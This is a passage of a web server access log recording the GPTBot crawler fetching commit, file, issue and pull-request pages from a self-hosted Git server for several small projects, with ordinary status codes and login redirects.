AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11202] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11619] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11199] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11096] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:18:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:18:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 11289] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:18:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:11:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481900] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md" -[17/Feb/2026:18:11:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:11:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:11:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:11:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:18:11:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:18:11:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:18:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:18:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 16] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:18:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 957] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:18:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_deps?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:18:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:18:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log?display=source" [Client 74.7.227.38] [Length 11430] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:18:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:18:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_deps?display=rendered" [Client 74.7.227.38] [Length 10955] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:18:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log?display=source" [Client 74.7.227.38] [Length 11432] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:18:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13195] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13200] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 11752] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11415] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 11751] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11413] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11413] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 11752] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 